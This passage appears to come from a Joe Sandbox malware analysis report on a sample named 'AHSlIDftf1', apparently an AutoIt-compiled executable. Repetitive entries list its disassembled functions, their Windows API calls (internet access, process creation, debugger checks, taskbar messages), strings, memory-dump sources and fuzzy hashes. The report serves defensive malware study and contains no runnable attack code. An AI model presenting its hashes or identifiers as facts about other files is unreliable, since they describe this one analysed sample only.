                                                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DCCD7D
                                                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DCCDA6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$OpenOption
                                                                                                            • String ID: <local>
                                                                                                            • API String ID: 942729171-4266983199
                                                                                                            • Opcode ID: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
                                                                                                            • Instruction ID: 4b8a0e1adba8d537a404c0372b1a3bd3f6d70bbde230a88e2c8fb4a28a7f6ba6
                                                                                                            • Opcode Fuzzy Hash: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
                                                                                                            • Instruction Fuzzy Hash: 1011E371621633BAD7345A668C84FE3BE68EB127A4F00522AF24E83180D2709841D6F0
                                                                                                            Function 00DE3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 00DE34AB
                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DE34BA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                            • String ID: edit
                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                            • Opcode ID: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
                                                                                                            • Instruction ID: d4da44a177282265b9b0e1a075cc80b11e2dc863ca886981921be9c306e3c485
                                                                                                            • Opcode Fuzzy Hash: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
                                                                                                            • Instruction Fuzzy Hash: CE11BF71100288AFEB126E66DC88ABB376AEB05374F904324F965D71E0C731DD519B70
                                                                                                            Function 00DB6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                            • CharUpperBuffW.USER32(?,?,?), ref: 00DB6CB6
                                                                                                            • _wcslen.LIBCMT ref: 00DB6CC2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: STOP
                                                                                                            • API String ID: 1256254125-2411985666
                                                                                                            • Opcode ID: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
                                                                                                            • Instruction ID: 48fb1507faed3d595054b151ab69053a1b2a5949d3a91f5d7d7d82ef278148cd
                                                                                                            • Opcode Fuzzy Hash: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
                                                                                                            • Instruction Fuzzy Hash: 80010432A00526CBCB20AFBDCC918FF7BA5EA607107440928E85396190EB39D844C670
                                                                                                            Function 00DB1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DB1D4C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
                                                                                                            • Instruction ID: 7bcf0fec1541c5451685cb757b3df35106ab570d37800f1fc628d6498ead3c9f
                                                                                                            • Opcode Fuzzy Hash: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
                                                                                                            • Instruction Fuzzy Hash: 8C01D479601218EB8F18EBA4CC61CFEB7A9EB56350B540A19FC63673D1EA30991C8670
                                                                                                            Function 00DB1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DB1C46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
                                                                                                            • Instruction ID: 20ffd8aa884f2a70ad922ded485a7a1f27a4dcc19968b14d3af91760c7c9516a
                                                                                                            • Opcode Fuzzy Hash: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
                                                                                                            • Instruction Fuzzy Hash: 34016779681204E6CF14EB90C962DFFBBA9DB55340F540419AC5777282EA309E1C96B1
                                                                                                            Function 00DB1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DB1CC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
                                                                                                            • Instruction ID: 12da372de9f9a7aee8866be304d72d9624a311ff864793dc04e44da413e4c5c7
                                                                                                            • Opcode Fuzzy Hash: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
                                                                                                            • Instruction Fuzzy Hash: 3C01A7B9640214E6CF14E795CA21EFEBBA8DB11340B540415BC0373281EA209F189671
                                                                                                            Function 00DB1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD
                                                                                                              • Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA
                                                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00DB1DD3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                                                            • String ID: ComboBox$ListBox
                                                                                                            • API String ID: 624084870-1403004172
                                                                                                            • Opcode ID: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
                                                                                                            • Instruction ID: 5818137273f901f56729e8276b865ada133951843cdcdbdbedc4f06ba76a4d3e
                                                                                                            • Opcode Fuzzy Hash: c86d923c40f416ca3362d0566a4ae3aaf9cac46f09f0ea2423b35f41fe7b0ab4
                                                                                                            • Instruction Fuzzy Hash: 39F08175A51314E6DB14A7A4CC62EFEB768EB11350F940919BC63672C2DA70990C8270
                                                                                                            Function 00DE8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E23018,00E2305C), ref: 00DE81BF
                                                                                                            • CloseHandle.KERNEL32 ref: 00DE81D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: \0
                                                                                                            • API String ID: 3712363035-3218720685
                                                                                                            • Opcode ID: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
                                                                                                            • Instruction ID: cba6c09d37d2f7188a9adba59e69e137416021306d3eb8134083fcd7ff3b5e64
                                                                                                            • Opcode Fuzzy Hash: f41c34943f9c47c6caa327ea478243c282c55a16b50de41a31d1bf69cc07f80a
                                                                                                            • Instruction Fuzzy Hash: 3DF082B1640350BEE3207772AC46FB73A5CEB05751F004424BB4CE91A2D67D8E059BF8
                                                                                                            Function 00DD747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: 3, 3, 16, 1
                                                                                                            • API String ID: 176396367-3042988571
                                                                                                            • Opcode ID: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
                                                                                                            • Instruction ID: 0c0081114d4122bdd4484bd56494274491a1a6504f8ba6ef5ee002fb0ff76e46
                                                                                                            • Opcode Fuzzy Hash: bd613eb22cc8d0bdebc73dc4e7c17a29308750e8b67a1feba929658bf66e58aa
                                                                                                            • Instruction Fuzzy Hash: 44E02B122043201192331279DCC197F5689CFC5760714186FFA89C2366FB948D9193B1
                                                                                                            Function 00DB0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DB0B23
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message
                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                            • API String ID: 2030045667-4017498283
                                                                                                            • Opcode ID: d6964913550c7083678bf30fd4b481d37a94f63df483a617465e974ef00b7cb3
                                                                                                            • Instruction ID: 2775e1c24c21969304da08965c7ae233038436ef7ae45843035a6e84578addf6
                                                                                                            • Opcode Fuzzy Hash: d6964913550c7083678bf30fd4b481d37a94f63df483a617465e974ef00b7cb3
                                                                                                            • Instruction Fuzzy Hash: 6DE0D8322843486BD21537557C03FC97E84CF05B21F100426FF58955C3CBE2689006B9
                                                                                                            Function 00D70D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D6F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D70D71,?,?,?,00D5100A), ref: 00D6F7CE
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00D5100A), ref: 00D70D75
                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D5100A), ref: 00D70D84
                                                                                                            Strings
                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D70D7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                            • API String ID: 55579361-631824599
                                                                                                            • Opcode ID: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
                                                                                                            • Instruction ID: 024dbd55c12e0f0164fdc52db44bd9f0ae45c9d8511419c13a5d10d5131e1298
                                                                                                            • Opcode Fuzzy Hash: c729ab452396e63318835b80879bdb20427c02cf7f0c2d3e88d2efd943b55364
                                                                                                            • Instruction Fuzzy Hash: D8E06D702007918FD330AFB9E4443427FE0EB10B45F04896DE886CAB91EBB0E4498BB1
                                                                                                            Function 00D6E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 00D6E3D5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Init_thread_footer
                                                                                                            • String ID: 0%$8%
                                                                                                            • API String ID: 1385522511-2949748613
                                                                                                            • Opcode ID: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
                                                                                                            • Instruction ID: 1d0e91ac54cc2087b25dcf94342e189dec56b7a1cf7af2e242432d35997bbf29
                                                                                                            • Opcode Fuzzy Hash: 8343d5d9c35d9c974fc63878709101743e1494289b0a2f5ed6b00ea4e0c128e0
                                                                                                            • Instruction Fuzzy Hash: 29E02635880A20EFC614A71DF855A883351EF49321B90D16CE602AB2D1EB342846867A
                                                                                                            Function 00DAD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LocalTime
                                                                                                            • String ID: %.3d$X64
                                                                                                            • API String ID: 481472006-1077770165
                                                                                                            • Opcode ID: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
                                                                                                            • Instruction ID: db239eac5b319d6d39fbf0826374917b944209a75e7ec02bca261aab55414021
                                                                                                            • Opcode Fuzzy Hash: 62451f2276c387be11fb1e2ac8334e7c899b5145f54b640949658e0329ba1771
                                                                                                            • Instruction Fuzzy Hash: CDD012B1C08209EACB5097D0DC45AF9B37DFB0A301F508452F997E1440D634C548E775
                                                                                                            Function 00DE2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE236C
                                                                                                            • PostMessageW.USER32(00000000), ref: 00DE2373
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
                                                                                                            • Instruction ID: 6ace39208ff3ce88a5c48aadb767f44b3232d52bf10fbdda0e1c007a50b1eeac
                                                                                                            • Opcode Fuzzy Hash: 7eb64cb5b014aab2f93f3fa17c028f4b8d1423b1198176b93045442812782c38
                                                                                                            • Instruction Fuzzy Hash: F1D0C936391350BBE664B7709C4FFCA66149B04B10F0059167646EA2E0C9A0B8468A64
                                                                                                            Function 00DE2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00DE232C
                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00DE233F
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                            • String ID: Shell_TrayWnd
                                                                                                            • API String ID: 529655941-2988720461
                                                                                                            • Opcode ID: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
                                                                                                            • Instruction ID: e602632b255da90fc2ebd1924c702f4a40f10a651cada688287d71cc2d178ff3
                                                                                                            • Opcode Fuzzy Hash: 75a4b4a2c53dcb9df7ff376b68a5d15fee8079c549cdc9bdacf026ff682d0949
                                                                                                            • Instruction Fuzzy Hash: 37D0C9363A5350BBE664B7709C4FFCA6A149B00B10F005916764AEA2E0C9A0A8468A64
                                                                                                            Function 00D8BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00D8BE93
                                                                                                            • GetLastError.KERNEL32 ref: 00D8BEA1
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D8BEFC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
